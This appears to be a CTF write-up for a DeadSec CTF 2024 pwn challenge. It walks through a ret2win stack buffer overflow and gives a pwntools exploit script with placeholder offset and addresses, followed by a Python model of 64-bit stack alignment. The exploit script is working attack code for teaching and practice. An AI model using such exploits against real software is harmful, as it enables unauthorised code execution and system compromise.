Pwn_bloodh7nt.rar Page

The file pwn_bloodh7nt.rar is a challenge from the pwn category of the DeadSec CTF 2024. To solve it, you need to exploit a buffer overflow vulnerability to execute a "ret2win" attack, redirected by a specific game mechanic within the binary.

Below is a breakdown of the exploitation process, which would make for an excellent technical blog post:

Reconnaissance: Using a tool like checksec, you'll notice which mitigations are enabled, but there is no Stack Canary. This suggests a classic stack-based buffer overflow.

The vulnerability: The gets() function (or a similar unsafe read) is used to take the player's name, allowing you to overwrite the saved instruction pointer (RIP) on the stack.

Finding the offset: To control the program's flow, you first need to find exactly how many bytes are required to reach the return address. You can find it using GDB with the pwndbg or GEF extension.

Writing the exploit: Once you have the offset and the address of the win() function (found via `info functions` in GDB or `nm binary`), you can write a simple Python exploit using the pwntools library:

```python
from pwn import *

# Setup
target = process('./pwn_bloodh7nt')
# target = remote('addr', port)  # For the live challenge

win_addr = 0x40123b   # Replace with the actual address from your analysis
offset = 40           # Replace with your discovered offset

# The Payload
# We add a 'ret' gadget if the binary is 64-bit to align the stack for system() calls
ret_gadget = 0x40101a

payload = b"A" * offset
payload += p64(ret_gadget)
payload += p64(win_addr)

target.sendline(payload)
target.interactive()
```

Stack alignment: In this specific challenge, many players ran into a common 64-bit exploitation issue: stack alignment. The win() function likely calls system(), which requires the stack to be 16-byte aligned. If your exploit crashes at the movaps instruction inside system(), adding a dummy ret gadget (as shown in the script above) before win_addr usually fixes the issue.

Summary for a Blog Post
Difficulty: Easy/Beginner
Key Concept: Stack Buffer Overflow & Stack Alignment
Tools Used: pwntools, gdb-pwndbg, checksec
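To see why the dummy ret gadget fixes the movaps crash, here is an added example (not part of the original writeup and not code from the CTF) that tracks rsp modulo 16 from the vulnerable function's `ret` to the entry of system(). It assumes the usual SysV x86-64 layout: the vulnerable function was entered by a normal `call`, and win() only does a `push rbp` before calling system(), with any other frame adjustment a multiple of 16; the offset and addresses are the placeholders from the script above.

```python
import struct


def p64(value: int) -> bytes:
    """Little-endian 8-byte pack, the same layout pwntools' p64() produces."""
    return struct.pack("<Q", value)


def build_payload(offset: int, chain: list[int]) -> bytes:
    """Padding up to the saved RIP, followed by the return addresses in order."""
    return b"A" * offset + b"".join(p64(addr) for addr in chain)


def rsp_mod16_at_system_entry(chain: list[int]) -> int:
    """Model of rsp % 16 from the overflowed function's `ret` until system() starts.

    Constructed model (assumptions, not measured from the binary):
    - the vulnerable function was reached by a normal `call`, so when it executes
      `ret`, rsp points at the saved RIP and rsp % 16 == 8;
    - every entry in `chain` is consumed by one `ret` (rsp += 8 each);
    - the last entry is win(), whose prologue is `push rbp` and which then does
      `call system`; any other frame adjustment is a multiple of 16.
    """
    rsp = 8
    for _ in chain:          # each `ret` pops one 8-byte entry off the stack
        rsp = (rsp + 8) % 16
    rsp = (rsp - 8) % 16     # win(): push rbp
    rsp = (rsp - 8) % 16     # win(): call system -> pushes the return address
    return rsp


def system_entry_aligned(chain: list[int]) -> bool:
    """SysV ABI: on entry to any function rsp % 16 == 8 (rsp + 8 is 16-byte aligned).

    system()'s prologue relies on this; if it enters with rsp % 16 == 0, a later
    16-byte movaps store to an [rsp+...] slot faults, which is the crash the text describes.
    """
    return rsp_mod16_at_system_entry(chain) == 8


WIN_ADDR = 0x40123B    # placeholder from the script above
RET_GADGET = 0x40101A  # placeholder from the script above
OFFSET = 40

if __name__ == "__main__":
    for chain in ([WIN_ADDR], [RET_GADGET, WIN_ADDR]):
        print([hex(a) for a in chain], "aligned:", system_entry_aligned(chain),
              "payload bytes:", len(build_payload(OFFSET, chain)))
```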
